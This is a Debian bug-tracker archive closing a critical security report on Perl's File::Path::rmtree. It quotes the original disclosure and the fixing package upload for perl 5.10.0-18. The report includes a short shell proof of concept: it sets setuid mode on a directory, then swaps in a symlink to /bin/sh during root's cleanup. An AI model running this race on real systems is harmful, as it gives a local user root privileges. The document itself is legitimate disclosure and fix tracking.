Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)

Debian Bug Tracking System Thu, 27 Nov 2008 13:35:16 -0800

Your message dated Thu, 27 Nov 2008 21:18:05 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#286905: fixed in perl 5.10.0-18
has caused the Debian Bug report #286905,
regarding perl-modules: File::Path::rmtree makes setuid
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

--- Begin Message ---

Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Noting USN-44-1 e.g. in

  http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html

I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:

   170          (undef, undef, my $rp) = lstat $root or next;
   171          $rp &= 07777;   # don't forget setuid, setgid, sticky bits
   172          if ( -d _ ) {
   ...
   209              if (rmdir $root) {
   210                  ++$count;
   211              }
   212              else {
   213                  carp "Can't remove directory $root: $!";
   214                  chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : 
$root))
   215                      or carp("and can't restore permissions to "
   216                              . sprintf("0%o",$rp) . "\n");
   217              }
   218          }
   ...

Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:

  mkdir -p /tmp/psz/sh
  perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
  chmod 4777 /tmp/psz/sh

While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:

  mv /tmp/psz/sh /tmp/psz/dummy
  ln -s /bin/sh /tmp/psz/sh

Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.

I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.

(A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED]
and [EMAIL PROTECTED]; Tim.Bunce bounced.)

Cheers,

Paul Szabo - [EMAIL PROTECTED]  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii  perl                          5.6.1-8.7  Larry Wall's Practical Extraction

--- End Message ---

--- Begin Message ---

Source: perl
Source-Version: 5.10.0-18

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:

libcgi-fast-perl_5.10.0-18_all.deb
  to pool/main/p/perl/libcgi-fast-perl_5.10.0-18_all.deb
libperl-dev_5.10.0-18_i386.deb
  to pool/main/p/perl/libperl-dev_5.10.0-18_i386.deb
libperl5.10_5.10.0-18_i386.deb
  to pool/main/p/perl/libperl5.10_5.10.0-18_i386.deb
perl-base_5.10.0-18_i386.deb
  to pool/main/p/perl/perl-base_5.10.0-18_i386.deb
perl-debug_5.10.0-18_i386.deb
  to pool/main/p/perl/perl-debug_5.10.0-18_i386.deb
perl-doc_5.10.0-18_all.deb
  to pool/main/p/perl/perl-doc_5.10.0-18_all.deb
perl-modules_5.10.0-18_all.deb
  to pool/main/p/perl/perl-modules_5.10.0-18_all.deb
perl-suid_5.10.0-18_i386.deb
  to pool/main/p/perl/perl-suid_5.10.0-18_i386.deb
perl_5.10.0-18.diff.gz
  to pool/main/p/perl/perl_5.10.0-18.diff.gz
perl_5.10.0-18.dsc
  to pool/main/p/perl/perl_5.10.0-18.dsc
perl_5.10.0-18_i386.deb
  to pool/main/p/perl/perl_5.10.0-18_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niko Tyni <[EMAIL PROTECTED]> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 21 Nov 2008 00:49:57 +0200
Source: perl
Binary: perl-base libcgi-fast-perl perl-doc perl-modules perl-debug perl-suid 
libperl5.10 libperl-dev perl
Architecture: source all i386
Version: 5.10.0-18
Distribution: unstable
Urgency: high
Maintainer: Brendan O'Dea <[EMAIL PROTECTED]>
Changed-By: Niko Tyni <[EMAIL PROTECTED]>
Description: 
 libcgi-fast-perl - CGI::Fast Perl module
 libperl-dev - Perl library: development files
 libperl5.10 - Shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - minimal Perl system
 perl-debug - Debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules - Core Perl modules
 perl-suid  - Runs setuid Perl scripts
Closes: 286905
Changes: 
 perl (5.10.0-18) unstable; urgency=high
 .
   * [SECURITY] CVE-2005-0448 revisited: File::Path::rmtree no longer
     allows creating of setuid files. (Closes: #286905)
Checksums-Sha1: 
 171bc598ef035e6a378c9c8e81d8c7bb49df22f0 1307 perl_5.10.0-18.dsc
 b53e28cd1ea933d725a2a1ffd35346a3fc7b9fc3 135235 perl_5.10.0-18.diff.gz
 3b0b558c75d6f93f04e948890540b5efe5649ab9 44216 
libcgi-fast-perl_5.10.0-18_all.deb
 45bc807c81a605c3a204663817a06b6e27ed7238 8214774 perl-doc_5.10.0-18_all.deb
 96efc7b35da591651e3b699b2eb6256bff0ca4e7 3188612 perl-modules_5.10.0-18_all.deb
 7470186887201a96e1d1a75bbf01aabb9a27c6a4 971098 perl-base_5.10.0-18_i386.deb
 1f0a713f22b425187f8ccad99f9af3911d38d258 6679902 perl-debug_5.10.0-18_i386.deb
 4391064616a619b021489eff8d7e11c5d38aeaeb 29648 perl-suid_5.10.0-18_i386.deb
 1896640960d462b753d970423e3ecbd252ad0724 623280 libperl5.10_5.10.0-18_i386.deb
 ed80284675d9890eccf70210f53357c8c8b680be 2356604 libperl-dev_5.10.0-18_i386.deb
 e3edadcc0db087a9db318e7c6ec4720d58bf513a 4542852 perl_5.10.0-18_i386.deb
Checksums-Sha256: 
 7cfa74a71d760095fb65e80c97daa636fce4f35896c3ef1312fcedf242979fb8 1307 
perl_5.10.0-18.dsc
 204e9bdd2d2182a7c01ad689c265eb8d6cfb2f2acfbbb29a9a761c44428b65d3 135235 
perl_5.10.0-18.diff.gz
 a2039a02f016dc385e1792f627eccc2a0186e1b573ce235f4ac211eba804cdd0 44216 
libcgi-fast-perl_5.10.0-18_all.deb
 37fcfa22dee8e193462f0e788efb9b632fcfd29852708f780a9b5bcf69b4bae5 8214774 
perl-doc_5.10.0-18_all.deb
 df3e19ba3c63c75a2bf12919ce6d8fa3cce4e65efa48b7c28176bcf9a73e94dd 3188612 
perl-modules_5.10.0-18_all.deb
 cc5aaf43abcb376ebd54f25602b244ebf0256d9e1ae2d5e411521eadce9bfe0b 971098 
perl-base_5.10.0-18_i386.deb
 e45374d585152936d49da3a0f569590b3ac4a2a7a8b633d9cb5e9c383a7be725 6679902 
perl-debug_5.10.0-18_i386.deb
 ee5aceaa881e49474ca6770d50ee8223559a6c8596da7a48e6e2aab6dad96c66 29648 
perl-suid_5.10.0-18_i386.deb
 b45e3df967781848ab67e622ef715799bbcfb015bd27daa614fdf588b030ee22 623280 
libperl5.10_5.10.0-18_i386.deb
 24980c2eac4511f2d1b331d04e0d1849eeafe15e42c3f486450d5c88211738db 2356604 
libperl-dev_5.10.0-18_i386.deb
 c17fd9a4f96867907129663490e151b8bb0381db3461e5ab3e8210c3c3d70efa 4542852 
perl_5.10.0-18_i386.deb
Files: 
 c0b3359faf4c23db04f07f45e647ffb1 1307 perl standard perl_5.10.0-18.dsc
 2f7b335f9b9f0c092d5748207ef9cc6b 135235 perl standard perl_5.10.0-18.diff.gz
 b8f51a9f0acf5f19c6b7456e890402ed 44216 perl optional 
libcgi-fast-perl_5.10.0-18_all.deb
 a8d335dba4babbd739c0f419f10d709f 8214774 doc optional 
perl-doc_5.10.0-18_all.deb
 253adac6efbba5c16323ebb29ddcd723 3188612 perl standard 
perl-modules_5.10.0-18_all.deb
 9b5eb5a132f323014e07868313cdb4a4 971098 perl required 
perl-base_5.10.0-18_i386.deb
 4a6a89e4ce667e2642524ea22502ed10 6679902 perl optional 
perl-debug_5.10.0-18_i386.deb
 1636a3f671cc46988d5f254386328cda 29648 perl optional 
perl-suid_5.10.0-18_i386.deb
 2ff3db485f93850b58a78fcf515001d2 623280 libs optional 
libperl5.10_5.10.0-18_i386.deb
 b461ccec626b25e1a290c3629d53ac0a 2356604 libdevel optional 
libperl-dev_5.10.0-18_i386.deb
 1d62128611ab83bef79ddadc8d32396c 4542852 perl standard perl_5.10.0-18_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkl9f8ACgkQiyizGWoHLTnnTACfeRJvh0az6jSwfMYELvIV8+i1
zbsAoLWg3YE48Vm306OhGRUe9L70m16M
=M5do
-----END PGP SIGNATURE-----

--- End Message ---

Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)

Reply via email to